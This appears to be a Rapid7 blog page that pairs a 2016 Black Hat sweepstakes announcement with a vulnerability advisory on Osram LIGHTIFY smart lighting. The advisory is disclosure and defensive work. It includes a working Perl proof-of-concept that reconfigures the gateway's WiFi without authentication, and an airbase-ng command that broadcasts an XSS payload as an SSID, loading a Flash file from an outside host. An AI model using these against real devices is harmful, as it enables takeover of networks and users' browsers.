At Rapid7, we refer to ourselves as "Moose" because the plural and the singular is the same word. When we refer to ourselves as moose, we are saying that while we all strive for excellence as individuals, we are stronger working together as a team with shared goals.  And we firmly believe this extends to our customers and community. After all, by working together, the community is able to support and educate each other to keep fighting for better security.

 

To demonstrate this philosophy about community-based security, and the power of working together, we will be introducing the Moose at our Black Hat Booth, #532.  We’re talking about a nine-foot moose here, so we encourage you to come by and take some photos with the Moose and share them on Twitter to enter our Black Hat sweeps.

 

Here’s the scoop:

Take a picture with our moose, tag #BHUSA and @rapid7 to be entered to win an Oculus Rift. Can’t come to the booth? Just share a moose pun or joke with @rapid7 and tag #BHUSA and you’ll be entered as well! Sweeps will open on August 3 and close on August 5 (plenty of time to get those pics uploaded or jokes shared after exhibits close). See below for official terms and conditions.

BH Contest Twitter Image 1024x512.jpg

 

 

Rapid7 Black Hat Twitter Sweeps

Terms & Conditions

 

The promotion is only open to residents in the United States and Canada who must be aged 18 or over.

 

No purchase is necessary to participate in the sweeps. Eligibility is dependent on following the entry rules outlined in this guide. Multiple entries will be accepted; however, no third party or bulk entries will be accepted. Entry submissions may not contain, as determined by Rapid7, any content that is obscene or offensive or violates any law.

 

To enter: On Twitter, share a post that includes either 1) a picture of the moose from Black Hat Booth #532 and the tag #BHUSA and @rapid7 or 2) a moose pun and the tag #BHUSA and @rapid7.

 

The sweeps will open on Wednesday, August 3, 2016 at 09:00:01 a.m. PT and close on Friday, August 5, 2016 at 09:59:59 p.m. PT. Entries made after these times will not be accepted.

 

One winner will be picked at random from the received eligible entries for the sweeps. The draw will take place by Tuesday, August 9 by 11:59:59 p.m. ET. The winner will be notified via the Rapid7 Twitter page and will have 48 hours to respond via direct message to claim the prize. If the prize is unclaimed after 48 hours, an alternate winner will be selected.

 

The prize for this sweeps is an Oculus Rift (estimated value $599) and will be shipped as soon as possible after the date of response from the winner. Prize is non-transferable or exchangeable. No cash or credit alternative is available. Should the prize become unavailable for any reason, Rapid7 reserves the right to provide a substitute prize of approximately equivalent or greater value. The winner list can be obtained after Monday, August 22, 2016 by emailing community @ rapid7 (dot) com.

 

Sweeps host is Rapid7 LLC, 100 Summer St, Boston, MA 02110.

 

By entering the sweeps, you agree to these terms and conditions. Employees and the immediate families of Rapid7 may not participate.

 

If you have any concerns or questions related to these terms and conditions, please email community @ rapid7 (dot) com.

Nine issues affecting the Home or Pro versions of Osram LIGHTIFY were discovered, with the practical exploitation effects ranging from the accidental disclosure of sensitive network configuration information, to persistent cross-site scripting (XSS) on the web management console, to operational command execution on the devices themselves without authentication. The issues are designated in the table below. At the time of this disclosure's publication, the vendor has indicated that all but the lack of SSL pinning and the issues related to ZigBee rekeying have been addressed in the latest patch set.

 

Description

Status

Platform

R7 ID

CVE

Cleartext WPA2 PSK

Fixed

Home

R7-2016-10.1

CVE-2016-5051

Lack of SSL Pinning

Unfixed

Home

R7-2016-10.2

CVE-2016-5052

Pre-Authentication Command Execution

Fixed

Home

R7-2016-10.3

CVE-2016-5053

ZigBee Network Command Replay

Unfixed

Home

R7-2016-10.4

CVE-2016-5054

Web Management Console Persistent XSS

Fixed

Pro

R7-2016-10.5

CVE-2016-5055

Weak Default WPA2 PSKs

Fixed

Pro

R7-2016-10.6

CVE-2016-5056

Lack of SSL Pinning

Unfixed

Pro

R7-2016-10.7

CVE-2016-5057

ZigBee Network Command Replay

Unfixed

Pro

R7-2016-10.8

CVE-2016-5058

Cached Screenshot Information Leak

Fixed

Pro

R7-2016-10.9

CVE-2016-5059

 

Product Description

According to the vendor's January, 2015 press release, Osram LIGHTIFY provides "a portfolio of cost-effective indoor and outdoor lighting products that can be controlled and automated via an app on your mobile device to help you save energy, enhance comfort, personalize your environment, and experience joy and fun." It is used for both residential and commercial customers, using either the Home and Pro versions, respectively. As a "smart lighting" offering, Osram LIGHTIFY is part of the Internet of Things (IoT) landscape, and is compatible with other ZigBee based automation solutions.

Credit

These issues were discovered by Deral Heiland, Research Lead at Rapid7, Inc., and this advisory was prepared in accordance with Rapid7's disclosure policy.

Exploitation and Mitigation

R7-2016-10.1: Cleartext WPA2 PSK (Home) (CVE-2016-5051)

Examination of the mobile application for LIGHTIFY Home, running on an iPad revealed the WiFi WPA pre-shared key (PSK) of the user's home WiFi as stored in cleartext in the file, /private/var/mobile/Containers/Data/Application/F1D60C51-6DF5-4AAE-9DB1- 40ECBDBDF692/Library/Preferences//com.osram.lightify.home.plist. Examining this file reveals the cleartext string as shown in Figure 1:

Figure 1, Cleartext WPA2 PSK

 

If the device is lost or stolen, an attacker could extract this data from the file.

Mitigation for R7-2016-10.1

A vendor-supplied patch should configure the mobile app to prevent storing potentially sensitive information, such as WiFi PSKs and passwords in cleartext. While some local storage is likely necessary for normal functionality, such information should be stored in an encrypted format that requires authentication.

 

Absent a vendor-supplied patch, users should avoid connecting the product to a network that is intended to be hidden or restricted. In cases where this is undesirable, users should ensure that the mobile device is configured for full-disk encryption (FDE) and require at least a password on first boot.

R7-2016-10.2: Lack of SSL Pinning (Home) (CVE-2016-5052)

Examination of the mobile application reveals that SSL pinning is not in use. By not implementing SSL pinning, it is possible for an attacker to conduct a Man-in-the-Middle (MitM) attack, ultimately exposing SSL-encrypted traffic to the successful attacker for inspection and manipulation.

Mitigation for R7-2016-10.2

A vendor-supplied patch should configure the mobile application to use SSL pinning.

 

Absent a vendor-supplied patch, users should avoid using the mobile application in potentially hostile networks.

R7-2016-10.3: Pre-Authentication Command Execution (Home) (CVE-2016-5053)

Examination of the network services on the gateway shows that port 4000/TCP is used for local control when Internet services are down, and no authentication is required to pass commands to this TCP port. With this access, an unauthenticated actor can execute commands to change lighting, and also execute commands to reconfigure the devices. The following Perl script proof of concept code can be used to reconfigure a vulnerable device's primary WiFi connection, causing it to reconnect to an attacker-supplied WiFi network.

 

#!/usr/bin/perl
# POC to change SSID setting on OSRAM LIGHTIFY GATEWAY
# Deral Heiland, Rapid7, Inc.

use IO::Socket;
if ($#ARGV != 2) {
  print " You are missing needed Arguments\n";
  print "Usage: lightify_SSID_changer.pl TargetIP SSID WPA_PSK \n";
  exit(1);
}

# Input variables
my $IP = $ARGV[0];
my $SSID = $ARGV[1];
my $WPAPSK = $ARGV[2];

# Set up TCP socket
$socket = new IO::Socket::INET (
  PeerAddr => $IP,
  PeerPort => 4000,
  Proto => TCP,
  )
or die "Couldn't connect to Target\n";

#Set up data to send to port 4000
$data1 = "\x83\x00\x00\xe3\x03\x00\x00\x00\x01";
$data2 = pack('a33',"$SSID");
$data3 = pack('a69',"$WPAPSK");
$data4 = "\x04\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
$send_data = join "", $data1, $data2, $data3, $data4;

#send data to port 4000
$socket->send($send_data);
close $socket;
exit;

 

 

Mitigation for R7-2016-10.3

A vendor-supplied patch should implement and enforce authentication on the gateway's 4000/TCP interface.

 

Absent a vendor-supplied patch, users should not deploy the gateway in a network environment used by potentially malicious actors.

R7-2016-10.4: ZigBee Network Command Replay (Home) (CVE-2016-5054)

Examination of the ZigBee home automation communication reveals that no rekeying of the Zigbee secure communication takes place after the initial pairing of the ZigBee-enabled end nodes (the light components of the system). Due to this lack of routine rekeying, it is possible for a malicious actor to capture and replay the Zigbee communication at any time, and replay those commands to disrupt lighting services without any other form of authentication.

Mitigation for R7-2016-10.4

Current Zigbee Home Automation Protocol Standard suffers from vulnerabilities preventing the ability to proper secure the Zigbee Home Automation protocol. The solution to resolving these inherent security flaws require fixing of the core protocol, which is under the control of the Zigbee alliance (http://www.zigbee.org/

 

Absent corrections of the Zigbee Home Automation protocol, users should not deploy the lighting components in a network environment used by potentially malicious actors.

R7-2016-10.5: Web Management Console Persistent XSS (Pro) (CVE-2016-5055)

The installed web management console, which runs on ports 80/TCP and 443/TCP, is vulnerable to a persistent Cross Site Scripting (XSS) vulnerability. This vulnerability allows a malicious actor to inject persistent JavaScript and HTML code into various fields within the Pro web management interface. When this data is viewed within the web console, the injected code will execute within the context of the authenticated user. As a result, a malicious actor can inject code which could modify the system configuration, exfiltrate or alter stored data, or take control of the product in order to launch browser-based attacks against the authenticated user's workstation.

 

The first example of this flaw was found by injecting persistent XSS into the security logs via the username field during the basic authentication sequence, as shown below in Figure 2.

Figure 2: Username XSS Injection

 

Anything entered in the "User Name" field gets written to the security logs without sanitization. When these logs are reviewed, the JavaScript is rendered and executed by the victim's browser. Figure 3 demonstrates an alert box run in this way.

Figure 3: Injected JavaScript Alert Box

The second example of this flaw was found by injecting XSS into the Wireless Client Mode configuration page. This was accomplished using a rogue access point to broadcast an SSID containing the XSS payload. Using the following airbase-ng command, it is possible to broadcast the XSS payload as an SSID name.

 

bash airbase-ng -e '</script><embed src=//ld1.us/4.swf>' -c 9 wlan0mon

 

When the SSID of </script><embed src=//ld1.us/4.swf> is displayed on the Wireless Client Mode configuration page, the referenced Flash file is downloaded and run in the context of the authenticated user. This is shown in Figure 4.

Mitigation for R7-2016-10.5

A vendor supplied patch should enforce that all data should be filtered and special characters such as > and <should be properly escaped before being displayed by the web management console.

 

Absent a vendor-supplied patch, users should not deploy the web management console in a network environment used by potentially malicious actors.

R7-2016-10.6: Weak Default WPA2 PSKs (Pro) (CVE-2016-5056)

Weak default WPA2 pre-shared keys (PSKs) were identified on the devices examined, which used an eight character PSK using only the characters from the set "0123456789abcdef". This extremely small keyspace of limited characters and a fixed, short length makes it possible to crack a captured WPA2 authentication handshake in less than 6 hours, leading to remote access to the cleartext WPA2 PSK. Figure 5 shows the statistics of cracking the WPA2 PSK on one device in 5 hours and 57 minutes.

Figure 5: Hashcat Cracking WPA2 PSK in Under Six Hours

 

A second device's WPA2 PSK was cracked in just 2 hours and 42 minutes, as shown in Figure 6:

Figure 6: Hashcat Cracking WPA2 PSK in Under Three Hours

Mitigation for R7-2016-10.6

A vendor-supplied patch should implement a longer default PSKs utilizing a larger keyspace that includes both uppercase and lowercase alphanumeric characters and punctuation, since these keys are not typically intended to be remembered by humans.

 

Absent a vendor-supplied patch, users should set their own PSKs with the above advice, and not rely on the shipped defaults by the vendor.

R7-2016-10.7: Lack of SSL Pinning (Pro) (CVE-2016-5057)

As in the Home version of the system, the Pro version does not implement SSL pinning in the mobile app. See R7-2016-10.2: Lack of SSL Pinning (Home) (CVE-2016-5052), above.

R7-2016-10.8: ZigBee Network Command Replay (Pro) (CVE-2016-5058)

As in the Home version of the system, the Pro version does not implement rekeying of the ZigBee commands. See R7-2016-10.4: ZigBee Network Command Replay (Home) (CVE-2016-5054), above.

R7-2016-10.9: Cached Screenshot Information Leak (Pro) (CVE-2016-5059)

Examination of the commissioning app revealed that the application was caching screenshot of the current page when the IPAD home button was selected in the folder, /private/var/mobile/Containers/Data/Application/A253B0DA-CFCE-433AB0A1- EAEB7B10B49C/Library/Caches/Snapshots/com.osram.LightifyPro/com.osr am.LightifyPro.

 

This practice can often lead to confidential data being stored within the snapshot folder on the IPAD device. As shown in Figure 7, the plain text password of the gateway is displayed in the cached screenshot.

 

Mitigation for R7-2016-10.9

A vendor-supplied patch should use a default page for the Downscale function when the home button is pressed, and that all passwords and keys displayed on the application configuration pages be obfuscated with asterisks.

 

Absent a vendor-supplied patch, users should be mindful of when they minimize the running mobile application to avoid accidentally disclosing sensitive information.

Disclosure Timeline

  • Mon, May 16, 2016: Initial contact to the vendor by Rapid7.
  • Tue, May 17, 2016: Vendor acknowledged receipt of vulnerability details.
  • Tue, May 31, 2016: Details disclosed to CERT/CC (Report number VR-174).
  • Wed, Jun 01, 2016: CVEs assigned by CERT/CC.
  • Thu, Jul 07, 2016: Disclosure timeline updated and communicated to the vendor and CERT/CC.
  • Thu, Jul 21, 2016: Vendor provided an update on patch development.
  • Tue, Jul 26, 2016: Public disclosure of the issues.

 

Update (Aug 10, 2016): Added a note about the Zigbee protocol for R7-2016-10.4 in the summary section.

Filter Blog

By date: By tag: